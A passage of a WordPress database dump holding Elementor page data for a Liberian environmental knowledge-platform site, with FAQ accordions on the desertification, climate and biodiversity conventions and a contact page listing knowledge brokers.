Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16862,2528,'_wp_page_template','default'),(16863,2528,'_elementor_edit_mode','builder'),(16864,2528,'_elementor_template_type','wp-page'),(16865,2528,'_elementor_version','2.7.5'),(16866,2528,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"},{\"tab_title\":\"How can i find knowledge resources on the EKMS?\",\"tab_content\":\"<p>Use the smart search feature on the homepage to search for keywords or better still select a category.<\\/p>\",\"_id\":\"39dd408\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16867,2528,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:21:\"typography_typography\";i:1;s:11:\"title_color\";i:1;}}}}s:9:\"accordion\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:4:\"tabs\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}s:5:\"style\";a:1:{s:12:\"section_typo\";a:3:{s:13:\"heading_color\";i:1;s:10:\"color_text\";i:1;s:16:\"color_link_hover\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}}'),(16869,335,'_edit_last','1'),(16870,335,'ocean_post_layout','full-width'),(16871,335,'ocean_sidebar','0'),(16872,335,'ocean_second_sidebar','0'),(16873,335,'ocean_disable_margins','enable'),(16874,335,'ocean_display_top_bar','default'),(16875,335,'ocean_display_header','default'),(16876,335,'ocean_center_header_left_menu','0'),(16877,335,'ocean_custom_header_template','0'),(16878,335,'ocean_header_custom_menu','0'),(16879,335,'ocean_menu_typo_font_family','0'),(16880,335,'ocean_disable_title','default'),(16881,335,'ocean_disable_heading','default'),(16882,335,'ocean_disable_breadcrumbs','default'),(16883,335,'ocean_display_footer_widgets','default'),(16884,335,'ocean_display_footer_bottom','default'),(16885,335,'ocean_custom_footer_template','0'),(16886,335,'osh_disable_topbar_sticky','default'),(16887,335,'osh_disable_header_sticky','default'),(16888,335,'osh_sticky_header_style','default'),(16889,2529,'_elementor_edit_mode','builder'),(16890,2529,'_elementor_template_type','wp-page'),(16891,2529,'_elementor_version','2.7.5'),(16892,2529,'_wp_page_template','default'),(16893,2529,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu 